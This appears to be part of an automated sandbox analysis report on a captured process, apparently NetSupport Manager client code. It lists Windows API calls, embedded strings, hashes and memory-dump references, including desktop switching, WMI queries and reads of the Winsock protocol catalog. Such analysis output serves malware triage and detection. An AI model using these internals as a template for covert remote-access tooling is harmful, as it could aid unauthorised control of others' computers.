                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                  • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                  • API String ID: 2036220054-60805735
                                                                                  • Opcode ID: 6b535c7b41aace8396d526edc80c79a44f907d57885ab2fb7f21c89248cbb4d8
                                                                                  • Instruction ID: e6b285a79aa3308c0e4e86645e8e2c70f1a73097c1882eeb774c19519f5c9288
                                                                                  • Opcode Fuzzy Hash: 6b535c7b41aace8396d526edc80c79a44f907d57885ab2fb7f21c89248cbb4d8
                                                                                  • Instruction Fuzzy Hash: 5D11C679A042167BE7086BB15C89FBFFA2DAFC571CF051438F91786545EE24B40483B6
                                                                                  APIs
                                                                                  • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115E3A8
                                                                                  • GetLastError.KERNEL32 ref: 1115E3B5
                                                                                  • wsprintfA.USER32 ref: 1115E3C8
                                                                                    • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                    • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                    • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                    • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                    • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                  • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115E40C
                                                                                  • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115E419
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                  • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                  • API String ID: 1734919802-1728070458
                                                                                  • Opcode ID: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
                                                                                  • Instruction ID: 2151ae3f148807adf1b9b51829e7bc1db46dc9b6ec15270657221fcdabbc1952
                                                                                  • Opcode Fuzzy Hash: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
                                                                                  • Instruction Fuzzy Hash: 1B110479A01319ABC720EFE69C84A96F7B4FF2231CB40822EE46543240DA706944CB51
                                                                                  APIs
                                                                                    • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                    • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                    • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                  • std::exception::exception.LIBCMT ref: 1111013A
                                                                                  • __CxxThrowException@8.LIBCMT ref: 1111014F
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                  • InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                  • InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                  • EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                  • LeaveCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111024F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                  • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                  • API String ID: 1976012330-1024648535
                                                                                  • Opcode ID: db19f8e7b9fff8ba68d37a9baa43a0e7c0721c068b2f24d3f0a3aafd2fe6ed90
                                                                                  • Instruction ID: 7e481d80fa827a07ee7257280804c30d2ae959ce5d98406b053f8524d928f6e4
                                                                                  • Opcode Fuzzy Hash: db19f8e7b9fff8ba68d37a9baa43a0e7c0721c068b2f24d3f0a3aafd2fe6ed90
                                                                                  • Instruction Fuzzy Hash: 6C41C2B5E00216AFDB11CFB98C84BAEFBF5FB48708F00453AE815DB244E675A944CB91
                                                                                  APIs
                                                                                  • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,1117F505,00000000,00000000,AD96CFBE,00000000,?,00000000), ref: 11060874
                                                                                  • _malloc.LIBCMT ref: 110608BB
                                                                                    • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                    • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                    • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                    • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                  • RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,000000FF,?,AD96CFBE,00000000), ref: 110608FB
                                                                                  • RegEnumValueA.ADVAPI32(?,00000000,?,00000100,00000000,?,000000FF,?), ref: 11060962
                                                                                  • _free.LIBCMT ref: 11060974
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
                                                                                  • String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
                                                                                  • API String ID: 999355418-161875503
                                                                                  • Opcode ID: ede5c3721df02264062f4e77cb696a88b6134c6cdb72e0f87da8dbc6f017e57a
                                                                                  • Instruction ID: c47c75eefe38bee888b154a00c4449ad07b8701d7df13cace45a3bfee881b040
                                                                                  • Opcode Fuzzy Hash: ede5c3721df02264062f4e77cb696a88b6134c6cdb72e0f87da8dbc6f017e57a
                                                                                  • Instruction Fuzzy Hash: E3A1B075A007469FE721CF64C880BABFBF8AF45308F044A5CE99697684E770F508CBA1
                                                                                  APIs
                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,AD96CFBE,00000000,?), ref: 1115BA67
                                                                                  • CoCreateInstance.OLE32(111C4FEC,00000000,00000017,111C4F1C,?), ref: 1115BA87
                                                                                  • wsprintfW.USER32 ref: 1115BAA7
                                                                                  • SysAllocString.OLEAUT32(?), ref: 1115BAB3
                                                                                  • wsprintfW.USER32 ref: 1115BB67
                                                                                  • SysFreeString.OLEAUT32(?), ref: 1115BC08
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                  • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                  • API String ID: 3050498177-823534439
                                                                                  • Opcode ID: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
                                                                                  • Instruction ID: 667e066b75244b2782fe63ff2368f72f8a2c2363a2cb4bcdb988270c73b3585f
                                                                                  • Opcode Fuzzy Hash: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
                                                                                  • Instruction Fuzzy Hash: 7351B071B00219ABC764CF69CC84F9AF7B9FB8A714F1042A8E429E7240DA70AE40CF55
                                                                                  APIs
                                                                                    • Part of subcall function 11145330: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                    • Part of subcall function 11145330: RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                  • _memset.LIBCMT ref: 11145485
                                                                                  • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                  • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                  • GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                  • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                  • API String ID: 4251163631-545709139
                                                                                  • Opcode ID: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
                                                                                  • Instruction ID: 76ed8f4553af2ae4cc76032582d3c5cf4b75be54885724a55a46303ac3459834
                                                                                  • Opcode Fuzzy Hash: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
                                                                                  • Instruction Fuzzy Hash: 07313971E002299BD761DF74D984BE9F7B6EB08729F540164E42DC7A80D7344984CF91
                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 110150CA
                                                                                  • _memset.LIBCMT ref: 1101510E
                                                                                  • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015148
                                                                                  Strings
                                                                                  • NSLSP, xrefs: 11015158
                                                                                  • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101504B
                                                                                  • PackedCatalogItem, xrefs: 11015132
                                                                                  • %012d, xrefs: 110150C4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: QueryValue_memsetwsprintf
                                                                                  • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                  • API String ID: 1333399081-1346142259
                                                                                  • Opcode ID: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
                                                                                  • Instruction ID: d38f3a4d66d5a90606c53f5b1b84405609ec5bb3b13ff7cea0d7775b25b40b12
                                                                                  • Opcode Fuzzy Hash: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
                                                                                  • Instruction Fuzzy Hash: C6419D71D02269AFEB11DB64CC90BDEF7B8EB44314F0445E9E819A7281EB35AB48CF50
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 1100FDED
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 1100FE10
                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 1100FE94
                                                                                  • __CxxThrowException@8.LIBCMT ref: 1100FEA2
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 1100FEB5
                                                                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100FECF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                  • String ID: bad cast
                                                                                  • API String ID: 2427920155-3145022300
                                                                                  • Opcode ID: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
                                                                                  • Instruction ID: 563b417412927bd42dfe2d2268ce551a617b01fe8fe711e168dc892134580a96
                                                                                  • Opcode Fuzzy Hash: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
                                                                                  • Instruction Fuzzy Hash: 5731E975D002669FD711DF94C890BAEF7B8EB04B68F10426DD921A7291DB717D40CB92
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                  • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                  • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                    • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                    • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                    • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                    • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                  • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                  • API String ID: 3494822531-1878648853
                                                                                  • Opcode ID: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
                                                                                  • Instruction ID: dd955378f98185685044f21f066d1e50e049b7277ab8e5714ac6db0ba135c9a8
                                                                                  • Opcode Fuzzy Hash: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
                                                                                  • Instruction Fuzzy Hash: AB518835D4022E5BD711CF24DC50BDEF7A4AF15B08F2401A4D8997BA80EBB27B84CBA5
                                                                                  APIs
                                                                                    • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EDC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                    • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                    • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                    • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                  • LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                  • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                  • std::exception::exception.LIBCMT ref: 11107414
                                                                                  • __CxxThrowException@8.LIBCMT ref: 11107429
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
